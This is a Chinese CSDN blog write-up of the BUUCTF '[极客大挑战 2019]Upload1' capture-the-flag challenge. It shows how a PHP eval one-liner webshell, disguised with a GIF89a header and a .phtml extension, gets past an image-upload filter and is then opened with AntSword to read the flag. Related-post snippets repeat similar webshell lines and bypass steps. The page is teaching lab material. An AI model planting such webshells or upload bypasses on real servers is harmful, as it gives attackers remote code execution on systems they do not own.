[极客大挑战 2019]Upload1

最新推荐文章于 2024-02-04 16:59:21 发布
最新推荐文章于 2024-02-04 16:59:21 发布
阅读量2.5k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63289925/article/details/124158073
版权

 题目提示要上传图片,先上传普通的一句话木马试试,发现得到都是No image

上传常见的图片木马

GIF89a

<script language='php'>@eval($_REQUEST[a]);</script>

用bp抓包,把文件后缀名改为test.phtml

因为发现后缀.php,.php2,.php3,.php4,.php5,.php6,.php7都不能显示上传成功,所以可能都被过滤了,只有.phtml可以

使用蚁剑连接,猜测保存在upload下面,并加上test.phtml

url:http://e8b06031-6b57-42e0-9dc4-16dcd04f73bc.node4.buuoj.cn:81/upload/test.phtml

即可在根目录找到flag

️ tjy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF——[极客挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
(文件上传upload) [极客挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 8737
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客挑战 2019]Upload1 ...
【BUUCTF】[极客挑战 2019]Upload1
aoao331198的博客
03-13 932
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1868
题目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
[极客挑战 2019]PHP
热门推荐
沐目的博客
12-14 1万+
这道题不怎么难,但还是学到了一些东西。记录一下。 1.public、protected与private在序列化时的区别 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。这也许解释了,为什么如果直接...
[极客挑战 2019]Upload 1
lppdlgg的博客
04-17 2884
1.判断为文件上传漏洞 2.在后续上传中发现有以下要求: 1..jpg格式 2. 文件内容不能有<? 3.部分php后缀被屏蔽 4.发现用.phtml可行 5.写入内容GIF89a? <script language="php">eval($_REQUEST[saxion])</script> 6.抓包,删除;.jpg后缀并重发 7.在url/upload中找到刚刚上传的文件,进入并复制地址 8.用蚁剑进行连接(succeed) 9.在...
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1324
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
[极客挑战 2019]Upload1(详解)
最新发布
2301_77451464的博客
02-04 586
这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开。由此可知,图片是有一个图片头的,可以用010editer打开看一下。文件名demo.php。图片头为GIF89a。
[极客挑战 2019]Upload
Do1phln的博客
09-05 121
上传成功,接着猜测文件保存的位置,首先猜测路径为upload,那么打开蚁剑尝试一下,连接成功,在根目录下即可找到flag。,上传失败,提示Do not lie me,怀疑是对图片内容有检测,因此在这之前再加上一部分。访问之后是一个文件上传的页面,接着就可以想到上传一句话木马进行控制。接着上传,用bp抓包修改文件类型为。
[极客挑战 2019]Upload 1做题记录
qq_45832949的博客
03-19 1227
进入题目链接,首先看到的是需要我们上传一个文件。 并且题目是upload,说明是要我们利用文件上传漏洞来获取flag。 我们首先创建一个文本文件,写上我们的一句话木马(eval($_POST[‘cmd’]????),目的是之后用工具查看网页后端文件。 试着上传phtml发现并没有上传成功,说明网页对前端检测 然后我们修改文件后缀名为xx.jpg再试着上传一次也没有成功,说明网页也有后端检测 最后尝试在一句话木马前加上gif的文件头 上传成功 然后重新上传,用bp进行抓包,修改上传文件的类型为phtml,只
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值